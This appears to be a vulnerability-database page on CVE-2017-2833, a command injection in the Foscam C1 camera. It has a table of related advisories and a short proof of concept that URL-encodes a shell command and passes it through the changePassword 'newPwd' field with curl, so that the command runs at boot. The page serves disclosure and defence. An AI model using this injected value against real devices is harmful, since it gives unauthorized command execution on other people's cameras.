| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Foscam C1 Indoor HD Camera Command Injection Vulnerability (CNVD-2018-10136) | 26 Apr 201800:00 | – | cnvd | |
| CVE-2017-2833 | 24 Apr 201819:00 | – | cve | |
| CVE-2017-2833 | 24 Apr 201819:00 | – | cvelist | |
| EUVD-2017-11974 | 7 Oct 202500:30 | – | euvd | |
| CVE-2017-2833 | 24 Apr 201819:29 | – | nvd | |
| CVE-2017-2833 | 24 Apr 201819:29 | – | osv | |
| Command injection | 24 Apr 201819:29 | – | prion | |
| Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability | 19 Jun 201700:00 | – | talos | |
| Vulnerability Spotlight: Multiple Foscam C1 Vulnerabilities Come in to Focus | 19 Jun 201708:45 | – | talosblog |
This vulnerability is reachable during the boot process. To trigger it, a command injection must be placed either in the username or in password field of the account. This can be done by the "changePassword" command, which requires a valid user account to change the password for:
```
$ sUsr="admin"
$ sPwd=""
$ sNewPwd=`perl -MURI::Escape -e 'print uri_escape(";echo y>/tmp/www/injected.txt")'`
$ curl "http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=${sUsr}&pwd=${sPwd}&cmd=changePassword&usrName=${sUsr}&oldPwd=${sPwd}&newPwd=${sNewPwd}"
```
The device should then be rebooted using other means, and the command will be executed upon boot. Note that any command that alters username and password can be used, for example the "addAccount" command.
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation